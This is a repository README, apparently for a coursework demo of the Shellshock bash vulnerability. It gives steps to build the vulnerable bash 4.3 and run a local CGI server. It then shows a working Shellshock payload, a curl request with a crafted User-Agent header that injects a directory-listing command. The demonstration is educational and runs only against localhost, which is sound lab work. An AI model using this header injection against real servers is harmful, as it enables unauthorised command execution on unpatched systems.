No description
- TeX 83.1%
- CSS 6.4%
- Shell 5.7%
- HTML 4.8%
| cgi-bin | ||
| debug_env.txt | ||
| exploit.png | ||
| feedback.txt | ||
| index.html | ||
| postTest.png | ||
| preTest.png | ||
| README.md | ||
| references.bib | ||
| report.pdf | ||
| report.tex | ||
| styles.css | ||
shellshockdemo
- Vulnerable bash version used: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
Setup:
- Clone repository
- Download outdated bash version
mkdir ~/old-bash && cd ~/old-bash
curl -O http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
tar -xzf bash-4.3.tar.gz
cd bash-4.3
- Compile bash Here we ignore some the compiler errors, these occur due to older C standard being used
CFLAGS="-fcommon -Wno-implicit-function-declaration -Wno-implicit-int" ./configure --prefix=$HOME/old-bash-bin
make -j$(nproc)
make install
- Check bash version (it should be 4.3)
~/old-bash-bin/bin/bash --version
- Replace the shebang in the cgi scripts with your compiled bash location and make sure they are executable
#!/home/yourusername/old-bash-bin/bin/bash
- Start any http sever with cgi scripts enabled in the cloned directory
python3 -m http.server --cgi 8000
- Send a malicious http header via curl
curl -H 'User-Agent: () { :; }; ls -la ../ >> ./feedback.txt' http://0.0.0.0:8000/cgi-bin/submit_feedback.cgi
If you look at the feedback page you will see a list of all files in the parent directory -> access control has been violated.